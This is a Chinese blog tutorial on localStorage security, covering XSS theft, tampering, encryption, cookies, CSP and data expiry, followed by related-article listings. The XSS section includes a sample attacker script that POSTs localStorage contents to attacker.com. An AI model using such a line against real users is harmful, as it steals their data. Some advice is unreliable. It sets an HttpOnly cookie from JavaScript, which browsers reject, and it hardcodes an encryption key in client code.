localstorage安全问题

于 2025-03-16 18:22:17 发布
阅读量676 收藏 20
点赞数 16
分类专栏: 笔记 文章标签: 前端
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45825917/article/details/146298827
版权

使用 localStorage 来缓存数据时,确实存在一定的安全风险,尤其是当你缓存了敏感数据(如用户认证信息、支付信息等)时,可能会导致数据泄露或被篡改。以下是常见的安全问题以及如何通过技术手段来提高安全性:

  1. localStorage 安全问题

(1)XSS 攻击(跨站脚本攻击)

问题:如果页面存在 XSS 漏洞,攻击者可以在浏览器中注入恶意脚本,窃取 localStorage 中的数据。

示例:攻击者通过插入恶意脚本获取并发送 localStorage 数据。

// 攻击者脚本示例
const userData = localStorage.getItem(‘user_info’);
fetch(‘https://attacker.com/stealData’, { method: ‘POST’, body: userData });

(2)数据篡改

问题:localStorage 是客户端存储,用户可以通过浏览器开发者工具修改其中的数据,导致数据被篡改。

示例:如果应用依赖 localStorage 中的某些数据进行用户认证,恶意用户可以手动修改 localStorage,伪造身份。

  1. 如何提高 localStorage 安全性?

(1)避免存储敏感数据

尽量不要将敏感数据(如用户密码、身份验证信息、支付信息等)存储在 localStorage 中。如果必须存储敏感数据,可以考虑加密这些数据,并确保加密密钥不存储在客户端。

方案:加密存储数据

可以使用 对称加密算法(如 AES)对存储在 localStorage 中的数据进行加密。

// 使用 CryptoJS 进行 AES 加密和解密
const CryptoJS = require(“crypto-js”);

// 加密数据
const encryptedData = CryptoJS.AES.encrypt(‘sensitiveData’, ‘encryptionKey’).toString();
localStorage.setItem(‘secureData’, encryptedData);

// 解密数据
const bytes = CryptoJS.AES.decrypt(localStorage.getItem(‘secureData’), ‘encryptionKey’);
const decryptedData = bytes.toString(CryptoJS.enc.Utf8);

注意:加密密钥不能存储在 localStorage 中,否则加密无效。

(2)使用 HTTPOnly 和 Secure Cookie

对于敏感数据,优先考虑使用 Cookie 而不是 localStorage,并设置 HttpOnly 和 Secure 标志,防止 JavaScript 访问和中间人攻击。

HttpOnly:只能通过服务器与客户端进行通信,无法通过 JavaScript 获取。

Secure:仅通过 HTTPS 传输。

// 设置一个 Secure 和 HttpOnly 的 Cookie
document.cookie = “sessionId=12345; Secure; HttpOnly; SameSite=Strict”;

优点:相比 localStorage,Cookie 会更安全,尤其是在存储会话信息时。

(3)避免 XSS 攻击

要保护 localStorage 中的数据,防止 XSS 攻击,应用应当:

严谨的输入验证:对用户输入进行严格的验证和清洗,避免恶意脚本执行。

内容安全策略(CSP):通过设置 CSP,限制外部脚本的执行,阻止恶意脚本的注入。

框架内置防护:使用现代框架(如 React、Vue)时,框架通常会自动处理 XSS 风险,通过转义用户输入来防止脚本注入。

(4)定期清理 localStorage

定期清理 localStorage 中的缓存数据,减少长期缓存敏感信息的风险。例如,在用户登出时清除所有缓存数据。

localStorage.clear(); // 清空所有缓存
localStorage.removeItem(‘secureData’); // 移除指定项

(5)限制数据存储的生命周期

为了减少缓存时间,可以在存储时加上有效期标志,超期后自动清除。

// 存储时记录时间戳
localStorage.setItem(‘data’, JSON.stringify({ value: ‘someData’, timestamp: Date.now() }));

// 使用时检查有效期
const data = JSON.parse(localStorage.getItem(‘data’));
if (data && Date.now() - data.timestamp > 3600000) { // 超过1小时
localStorage.removeItem(‘data’);
}

这样可以控制数据的生命周期,防止数据长期存储导致的安全隐患。

  1. 总结:使用 localStorage 时的安全最佳实践

  2. 避免存储敏感信息:不要将敏感信息(如密码、身份验证令牌)存储在 localStorage 中。

  3. 加密数据:对于存储在 localStorage 中的数据,进行加密并确保加密密钥不存储在客户端。

  4. 使用 HttpOnly 和 Secure Cookie:对于需要存储敏感信息的场景,优先使用 Cookie(带有 HttpOnly 和 Secure 标志)。

  5. 防止 XSS 攻击:应用程序应当做好输入验证,使用 CSP 和框架内置的防护措施。

  6. 定期清理缓存:定期清理 localStorage 中的缓存,尤其是在用户登出时。

  7. 限制数据存储的生命周期:可以通过存储有效期标志来自动清除过期数据。

通过采取这些措施,可以有效提高 localStorage 的安全性,降低因恶意攻击或数据泄露带来的风险。

Web数据存储之localStorage和sessionStorage
星曦的博客
07-22 650
Web数据存储之localStorage和sessionStorage学习前端以来,自己了解有localStorage和sessionStorage的相关存储的知识,也有实践过,但是之前只限于能用的基础上,但最近看了一本书,深入了解了localStorage和sessionStorage,才意识到自己了解太表面,于是想借此总结一下。1.Web存储简介Web存储分为两种,分别对应两个JavaScrip
localStorage本地存储小仓库 数据永久安全存储
12-09 1982
localStorage作为HTML5本地存储web storage特性的API之一,主要作用是将数据保存在客户端中,而客户端一般是指网站设计用户的计算机。在移动设备上,由于大部分浏览器都支持web storage特性,因此在android和ios等智能手机上的web浏览器都能正常使用该特性。 localStorage保存的数据,一般情况下是永久保存的,即只要采用localstorage保存信息...
HTML5 本地存储 Web Storage
歪脖先生的博客
04-26 592
Web StorageWeb Storage 是一项非常重要,并且很实用的技术,已经被大多数浏览器(包括IE8)所支持,在HTML4时代, 虽然cookie无处不在,但cookie仍然有自己的硬伤,如:cookie的大小是受限制的,一个cookie只能设置4KB的数据。并且大多数浏览器只允许每个站点存储20个Cookie;cookie保存的数据,无论服务器端是否需要,每次请求都会被发送到服务器端,...
别再用错 localStorage 了!小心踩坑!
最新发布
前端开发博客
06-07 3156
大家好,我是前端宝哥。在 Web 应用的客户端存储领域,localStorage API 凭借其简洁性和广泛支持,成为了开发者们的心头好。它就像一个小巧的本地仓库,让你能够直接在用户的浏览器中存储少量数据。这篇文章将带你深入了解 localStorage API 的方方面面,包括它的优势、局限性,以及在现代应用中可用的其他存储选项。localStorage 是什么?localStorage API...
安全与协议】cookies、session、sessionStorage和localStorage 全面分析对比
Umbrella_Um的博客
09-29 2838
在浏览器查看储存的数据 HTML4的本地存储 cookie 浏览器的缓存机制提供了可以将用户数据存储在客户端上的方式,可以利用cookie,session等跟服务端进行数据交互。 一、cookie和session cookie和session都是用来跟踪浏览器用户身份的会话方式。 区别: 保持状态:cookie保存在浏览器端,session保存在服务器端 使用方式: ① cookie机制...
token在前端保存的安全性思考
JavaMa的博客
12-15 4790
CSRF和XSS CSRF:用户在A网站登录,未退出A网站的前提下访问B网站,B网站向A网站发起请求,此时浏览器会携带用户在A网站的cookie请求A网站,A网站并不知道是用户的操作还是B网站(危险)的操作。 XSS:是向网站 A 注入 JS代码或html脚本等,然后执行 JS 里的代码,篡改网站A的内容或者盗用cookie等。 前端可以把token存储在localstorage或者cookie。 方案:存cookie比较好。 localstorage有xss风险 ,cookie有csrf 和xss风险。
LocalStorage
03-26
**LocalStorage:Web应用程序的持久化数据存储** LocalStorage是HTML5引入的一种本地存储机制,它允许Web应用程序在用户...开发者需要根据具体的应用场景和需求,合理利用LocalStorage,同时注意安全性和兼容性问题
android webview 中localStorage无效的解决方法
01-20
然而,在某些情况下,你可能会遇到在WebView中使用HTML5的localStorage时出现无法读写数据问题。这通常是因为WebView的一些设置没有正确配置,导致localStorage功能被禁用或者无法正常工作。以下是一些解决这个...
localstorage
05-06
5. **安全性**:LocalStorage 不提供任何加密措施,所以不应存储敏感信息。对于需要保护的数据,可以考虑使用 HTTPS 或其他加密手段。 6. **跨域问题**:LocalStorage 数据遵循同源策略,不同域名下的页面无法访问...
vue实现localStorage工具类
11-19
此外,我们还将了解如何实现缓存数据的自动过期机制,确保数据的有效性和安全性。 #### 二、LocalStorage工具类设计思路 ##### 2.1 基础操作封装 - **setItem**: 设置缓存数据 - **getItem**: 获取缓存数据 - **...
JavaScript使用localStorage存储数据
10-16
11. 安全性考虑:虽然localStorage提供了便利的存储方式,但存储在客户端的数据安全性较低,不应存储敏感信息,因为客户端容易被用户或其他恶意软件访问。 使用localStorage可以极大地提升Web应用的性能,减少...
localStorage使用总结
白不懂黑的静的专栏
06-24 464
一、什么是localStorage、sessionStorage 在HTML5中,新加入了一个localStorage特性,这个特性主要是用来作为本地存储来使用的,解决了cookie存储空间不足的问题(cookie中每条cookie的存储空间为4k),localStorage中一般浏览器支持的是5M大小,这个在不同的浏览器中localStorage会有所不同。 二、localStorage的优势与局限 localStorage的优势 1、localStorage拓展了cookie的4K限制 2、l
LocalStorage 的一个漏洞
热门推荐
龙哥盟
02-19 4万+
LocalStorage 是 html5 的本地存储,其中的内容以文件的形式保存在本地磁盘中。一个域(协议+域名+端口)的文件大小PC端为5~10M,移动端不大于2.5M。但是我们可以在端口上做点手脚,因为端口是可控的,我们可以开一个服务器监听很多个端口,然后输出的页面使用iframe进行递归包含。比如我们的页面可以嵌入以下代码:(function(){     var maxPort = ...;
防止localStorage和sessionStorage在开发工具中被篡改
m0_46701899的博客
12-24 9906
1.让localStorage值无法修改,不推荐 window.addEventListener('storage', function () { localStorage.setItem(e.key, e.oldValue) }); localStorage里面被篡改的部分 和原来数据 会来回进行切换 2.localStorage值被修改的时候清除他并且跳转到登录页,只有localStorage发送变化,包括新增,都会清楚,并跳转到登录,不推荐 window.ad...
【项目问题】Vue2和Vue3如何使用Pinia?数据持久化?防止storage被篡改
Dai的博客
08-10 1354
【项目问题】Vue2和Vue3如何使用Pinia?数据持久化?防止storage被篡改
清理localstorage_关于本地存储:在javascript中清除localStorage
weixin_35767338的博客
12-30 8875
是否有任何方法可以重置/清除浏览器在javascript中的本地存储?使用此项清除本地存储:localStorage.clear();如果应用程序在之后重新启动,它仍然存在…@半烤一点也不。也许你的应用程序又重新设置了?当我的应用程序启动时,我会调用localstorage.clear(),但即使我关闭浏览器、清除缓存等,数据仍然存在。我知道这一点是因为我在初始化时将模型上的"instance"属...
如何防止localStorage和sessionStorage在开发者工具中被手动修改?
qq_41083105的博客
11-06 4471
我写的项目使用到了localStorage进行判断当前用户是否已经登录,我没有用到token,我觉得这种方式也能实现,就自己想到用这种方法,如果用户没有断开登录,即使新开一个标签页,也可以保持之前的登录状态,避免用户多次登录,影响使用体验。 如题,我想介绍的方式是防止用户从浏览器的开发者工具中(chrome是application中进行查看localStorage和sessionStorage)对local和session(下均这二者均简称为local和session)进行...
清理localstorage_清除localStorage
weixin_40002611的博客
12-21 1386
清空localStorage的全部数据function $(id){return document.getElementById(id);}var intNum = 0;//保存数据函数function add_click(){for(var intI = 0;intI <= 5;intI++){var strKeyName = "strKeyName"+intI;var strKeyVal...
localstorage数据共享问题
07-28
但是需要注意cookie的大小限制和安全问题。 3. 使用其他浏览器特定的共享机制:某些浏览器提供了特定的机制来实现标签页之间的数据共享,如sessionStorage、IndexedDB等。但是这种方法只适用于特定的浏览器,并且...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值